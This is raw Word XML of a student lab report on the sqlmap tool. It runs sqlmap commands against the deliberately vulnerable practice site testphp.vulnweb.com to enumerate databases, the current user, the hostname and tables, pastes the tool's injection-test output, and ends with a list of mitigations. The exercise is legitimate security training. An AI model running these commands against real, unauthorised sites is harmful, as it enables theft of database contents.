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SQL map</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ind w:left="6237"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 JAGAN KUMAR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:ind w:left="6237"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DIET</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Purpose and Usage of SQL Map: </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SQL Map is a tool used for detecting and exploiting SQL injection vulnerabilities in web applications. </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automates the process of identifying and exploiting SQL injection flaws, making it easier for penetration testers to assess the security of web applications. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Installation of SQL Map: </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SQL Map is written in Python and can be easily installed on most operating systems. </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install SQLMap by cloning its GitHub repository or by using package managers like apt (for Debian-based systems) or yum (for Red Hat-based systems). </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on Debian-based systems, you can install SQLMap using the following command: sudo apt-get install sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Identifying a Vulnerable Web Application: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use intentionally vulnerable web applications like DVWA (Damn Vulnerable Web Application) or Web Goat for practicing SQL injection attacks. </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 and set up DVWA on your local machine or use online platforms like OWASP Juice Shop.</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 www.testphp.vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Performing a Basic SQL Injection Attack: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SQLMap to perform a basic SQL injection attack against the chosen target.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command: sqlmap -u "http://target.com/page.php?id=1" --dbs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command will identify the databases present in the target application by exploiting the SQL injection vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Syntax: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sqlmap -u &lt;website_link&gt; --crawl=2 </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Sqlmap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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId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http://testphp.vulnweb.com/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--crawl=2</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--batch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command for automatic response to yes/no questions while executing the commands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731510" cy="518223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518223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From the sql injection we got:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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'Generic inline queries'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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OR error-based - WHERE or HAVING clause (EXP)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'</w:t>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AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'</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OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'</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4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'</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4.1 OR error-based - WHERE or HAVING clause (FLOOR)'</w:t>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OR error-based - WHERE or HAVING clause (FLOOR)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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error-based - Parameter replace (BIGINT UNSIGNED)'</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5.5 error-based - Parameter replace (EXP)'</w:t>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5.6 error-based - Parameter replace (GTID_SUBSET)'</w:t>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5.7.8 error-based - Parameter replace (JSON_KEYS)'</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 error-based - Parameter replace (FLOOR)'</w:t>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error-based - Parameter replace (UPDATEXML)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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5.1 error-based - Parameter replace (EXTRACTVALUE)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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inline queries'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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stacked queries (comment)'</w:t>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considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)</w:t>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stacked queries'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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stacked queries (query SLEEP - comment)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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stacked queries (query SLEEP)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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&lt; 5.0.12 stacked queries (BENCHMARK - comment)'</w:t>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&lt; 5.0.12 stacked queries (BENCHMARK)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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AND time-based blind (query SLEEP)'</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OR time-based blind (query SLEEP)'</w:t>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AND time-based blind (SLEEP)'</w:t>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'MySQL &gt;= 5.0.12 OR time-based blind (SLEEP)'</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parameter 'artist' appears to be 'MySQL &gt;= 5.0.12 OR time-based blind (SLEEP)' injectable </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'Generic UNION query (NULL) - 1 to 20 columns'</w:t>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automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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 BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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 URL appears to have 3 columns in query</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are saved in this path '/home/kali/.local/share/sqlmap/output/results-02252024_1012am.csv'</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the following command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cat '/home/kali/.local/share/sqlmap/output/results-02252024_1012am.csv'</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sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs –batch</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databases and its names in the SQL</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584454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58445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data found like version, user database name etc as shown in above image.</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661416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661416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510" cy="54102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there are 3 tables are found.</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“sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --current-user --current-db –hostname”</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this command we can found current user, current database, hostname as shown in below image.</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58256" cy="1760373"/>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8256" cy="17603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are trying to find tables and dump them as shown below.</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595122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595122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resultant tables.</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72796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Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">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Don’t use dynamic SQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">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Sanitize user-provided inputs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">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Encrypt private/confidential data being stored in the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">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Limit database permissions and privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">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a Web Application Firewall (WAF) for web applications that access databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">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secure coding and SDLC practices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">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input validation and sanitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">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stored procedures and parametrization</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">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prepared statements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:ind w:left="1020" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="111111"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use program analysis techniques and proxies</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testphp.vulnweb.com/"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